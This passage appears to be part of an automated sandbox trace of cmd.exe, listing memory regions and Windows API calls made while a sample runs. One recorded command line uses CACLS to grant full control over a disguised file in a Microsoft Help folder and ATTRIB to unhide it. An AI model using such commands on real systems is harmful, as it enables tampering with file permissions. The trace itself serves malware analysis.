"c:\\windows\\system32\\apisetschema.dll") Region: id = 28956 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28957 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffd3000" filename = "" Region: id = 28958 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28983 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28984 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28985 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28986 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 28987 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 28988 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28989 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28990 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28991 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28992 start_va = 0x76a90000 end_va = 0x76b3bfff 
entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28993 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28994 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28995 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28996 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28997 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 28998 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28999 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29000 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29001 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29002 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = 
private name = "private_0x00000000000e0000" filename = "" Region: id = 29003 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29004 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 29005 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 29006 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 29032 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 650 os_tid = 0xe18 [0196.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbe4 | out: lpSystemTimeAsFileTime=0x20fbe4*(dwLowDateTime=0xa9ff71c0, dwHighDateTime=0x1d440a9)) [0196.585] GetCurrentProcessId () returned 0xbc0 [0196.585] GetCurrentThreadId () returned 0xe18 [0196.585] GetTickCount () returned 0x37b56 [0196.585] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbdc | out: lpPerformanceCount=0x20fbdc*=25337424784) returned 1 [0196.586] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.586] __set_app_type (_Type=0x1) [0196.586] __p__fmode () returned 0x76b331f4 [0196.586] __p__commode () returned 0x76b331fc [0196.586] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.586] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.586] GetCurrentThreadId () returned 0xe18 [0196.586] OpenThread (dwDesiredAccess=0x1fffff, 
bInheritHandle=0, dwThreadId=0xe18) returned 0x38 [0196.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.586] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.586] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.586] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb74 | out: phkResult=0x20fb74*=0x0) returned 0x2 [0196.586] VirtualQuery (in: lpAddress=0x20fbab, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.587] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.587] GetConsoleOutputCP () returned 0x1b5 [0196.587] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.587] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.587] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.588] GetEnvironmentStringsW () returned 0x3a0240* [0196.588] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.588] GetEnvironmentStringsW () returned 0x3a0240* [0196.588] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0xd0, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 
[0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegCloseKey (hKey=0x40) returned 0x0 [0196.588] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", 
lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.589] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.589] RegCloseKey (hKey=0x40) returned 0x0 [0196.589] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.589] srand (_Seed=0x5b88639e) [0196.589] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" [0196.589] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" [0196.589] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.589] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.589] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.589] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.589] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.589] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.589] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.589] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.589] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.590] GetEnvironmentStringsW () returned 0x3a2390* [0196.590] FreeEnvironmentStringsW (penv=0x3a2390) returned 1 [0196.590] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.590] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.590] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.590] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.590] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.590] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0196.590] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.590] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.590] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8b0, lpFilePart=0x20f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8ac*="Desktop") returned 0x18 [0196.590] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.590] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.590] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.591] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.591] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.591] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.591] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.591] GetEnvironmentStringsW () returned 0x3a0240* [0196.591] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.591] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.591] GetConsoleOutputCP () returned 0x1b5 [0196.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0196.591] GetUserDefaultLCID () returned 0x409 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="1") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.592] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.593] GetConsoleTitleW (in: lpConsoleTitle=0x390950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0196.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.594] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0196.594] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0196.594] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0196.594] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0196.594] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0196.594] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0196.594] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0196.595] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0196.597] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0196.597] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0196.597] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0196.597] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0196.597] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0196.597] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0196.597] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0196.599] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.599] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0196.599] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0196.599] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 
[0196.599] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0196.599] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0196.599] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0196.599] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0196.599] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0196.599] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0196.599] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0196.599] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0196.599] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0196.599] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0196.600] _wcsicmp (_String1="CACLS", _String2="MOVE") 
returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0196.600] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0196.600] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0196.600] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0196.600] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0196.600] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0196.600] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0196.600] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0196.600] _wcsicmp (_String1="CACLS", _String2="SHIFT") 
